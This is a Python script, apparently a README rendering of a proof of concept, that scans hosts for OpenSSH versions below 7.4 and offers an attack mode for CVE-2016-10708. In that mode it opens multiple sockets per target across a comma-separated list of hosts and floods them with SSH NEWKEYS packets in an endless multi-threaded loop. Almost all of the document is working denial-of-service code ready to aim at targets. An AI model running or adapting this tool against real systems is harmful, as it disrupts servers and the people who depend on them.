README.md
Rendering markdown...
#!/usr/bin/env python3
import argparse
import logging
import os
import random
import socket
import struct
import signal
import sys
import time
from typing import List, Optional
from concurrent.futures import ThreadPoolExecutor
# ----------------------------------------------------------------------
# Constants & Defaults
# ----------------------------------------------------------------------
SSH_MSG_NEWKEYS = 21
MAX_BANNER_BYTES = 1024
MAX_SOCKETS_PER_TARGET = 5
MAX_THREADS = 10
DEFAULT_KEX_ALGOS = ["diffie-hellman-group14-sha1"]
DEFAULT_HOSTKEY_ALGOS = ["ssh-rsa"]
DEFAULT_ENC_ALGOS = ["aes128-ctr"]
DEFAULT_MAC_ALGOS = ["hmac-sha1"]
DEFAULT_COMP_ALGOS = ["none"]
# ----------------------------------------------------------------------
# Logging setup
# ----------------------------------------------------------------------
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s [%(levelname)s] %(message)s",
datefmt="%H:%M:%S",
)
log = logging.getLogger()
# ----------------------------------------------------------------------
# Normalize version string
# ----------------------------------------------------------------------
def _normalize_version(ver: str) -> str:
import re
m = re.match(r"(OpenSSH_[\d.]+)", ver)
return m.group(1) if m else ver
# ----------------------------------------------------------------------
# Fetch SSH banner and parse version
# ----------------------------------------------------------------------
def get_ssh_version(target: str, port: int = 22, timeout: float = 5.0) -> Optional[str]:
try:
with socket.create_connection((target, port), timeout=timeout) as sock:
sock.settimeout(timeout)
data = b""
while b"\n" not in data and len(data) < MAX_BANNER_BYTES:
chunk = sock.recv(1024)
if not chunk:
break
data += chunk
banner = data.decode(errors="ignore")
log.debug(f"Banner from {target}:{port}: {banner.strip()}")
except Exception as e:
log.error(f"Failed to retrieve banner from {target}:{port} – {e}")
return None
import re
m = re.search(r"OpenSSH_[\d.]+[A-Za-z0-9]*", banner)
return _normalize_version(m.group(0)) if m else None
# ----------------------------------------------------------------------
# Build NEWKEYS packet
# ----------------------------------------------------------------------
def build_newkeys_packet() -> bytes:
payload = struct.pack("B", SSH_MSG_NEWKEYS)
return _ssh_packet(payload)
# ----------------------------------------------------------------------
# Build raw SSH packet with correct padding
# ----------------------------------------------------------------------
def _ssh_packet(payload: bytes) -> bytes:
base_len = 4 + 1 + len(payload)
pad_len = (8 - (base_len % 8)) % 8
if pad_len < 4:
pad_len += 8
padding = os.urandom(pad_len)
packet_len = len(payload) + pad_len + 1
header = struct.pack(">I", packet_len) + struct.pack("B", pad_len)
return header + payload + padding
# ----------------------------------------------------------------------
# Exploit logic per thread
# ----------------------------------------------------------------------
def exploit_target(target: str, port: int, num_sockets: int):
sockets = []
for i in range(num_sockets):
try:
sock = socket.create_connection((target, port), timeout=5)
sock.sendall(b"SSH-2.0-OpenSSH_8.9\r\n") # Realistic banner
sockets.append(sock)
log.debug(f"[{target}] Socket {i+1} connected")
except Exception as e:
log.error(f"[{target}] Socket {i+1} failed: {e}")
newkeys = build_newkeys_packet()
count = 0
log.info(f"[{target}] Starting injection with {num_sockets} sockets")
try:
while True:
for sock in sockets:
try:
sock.sendall(newkeys)
count += 1
log.debug(f"Injected NEWKEYS #{count} ({len(newkeys)} bytes)")
except Exception:
continue
time.sleep(random.uniform(0.0005, 0.002)) # Random micro-delay
except KeyboardInterrupt:
log.info(f"[{target}] Interrupted")
finally:
for sock in sockets:
sock.close()
log.info(f"[{target}] Injection complete — NEWKEYS sent: {count}")
# ----------------------------------------------------------------------
# Scan mode
# ----------------------------------------------------------------------
def scan(target: str, port: int) -> None:
version = get_ssh_version(target, port)
if version:
log.info(f"{target}:{port} SSH version: {version}")
# Extract numeric version for comparison
import re
m = re.search(r"OpenSSH_(\d+\.\d+)", version)
if m:
ver_num = float(m.group(1))
if ver_num < 7.4:
# All OpenSSH versions before 7.4 are affected by CVE-2016-10708
log.warning(
f"{target}:{port} is running vulnerable OpenSSH {version} — CVE-2016-10708 applies"
)
else:
log.info(
f"{target}:{port} appears NOT vulnerable (OpenSSH {version} =≥ 7.4)"
)
else:
log.debug(f"{target}:{port} version format not recognized for vulnerability check")
else:
log.warning(f"{target}:{port} – could not determine SSH version")
# ----------------------------------------------------------------------
# Graceful shutdown on SIGINT/SIGTERM
# ----------------------------------------------------------------------
def _setup_signal_handlers() -> None:
for sig in (signal.SIGINT, signal.SIGTERM):
signal.signal(sig, lambda *_: sys.exit(1))
# ----------------------------------------------------------------------
# Main
# ----------------------------------------------------------------------
def main() -> None:
parser = argparse.ArgumentParser(description="Multi-Threaded DoS for SSH < 7.4 - CVE-2016-10708 PoC")
parser.add_argument("-t", "--targets", required=True, help="Comma-separated list of target IPs/hostnames")
parser.add_argument("-p", "--port", type=int, default=22, help="SSH port (default: 22)")
parser.add_argument("-m", "--mode", choices=["scan", "attack"], required=True, help="Mode: scan or attack")
parser.add_argument("--sockets", type=int, default=MAX_SOCKETS_PER_TARGET, help="Sockets per target (default: 5)")
parser.add_argument("--threads", type=int, default=MAX_THREADS, help="Max concurrent threads (default: 10)")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable debug logging")
args = parser.parse_args()
if args.verbose:
log.setLevel(logging.DEBUG)
log.debug("Debug logging enabled")
_setup_signal_handlers()
targets = [t.strip() for t in args.targets.split(",") if t.strip()]
if args.mode == "scan":
for tgt in targets:
scan(tgt, args.port)
else:
with ThreadPoolExecutor(max_workers=args.threads) as executor:
for tgt in targets:
executor.submit(exploit_target, tgt, args.port, args.sockets)
if __name__ == "__main__":
main()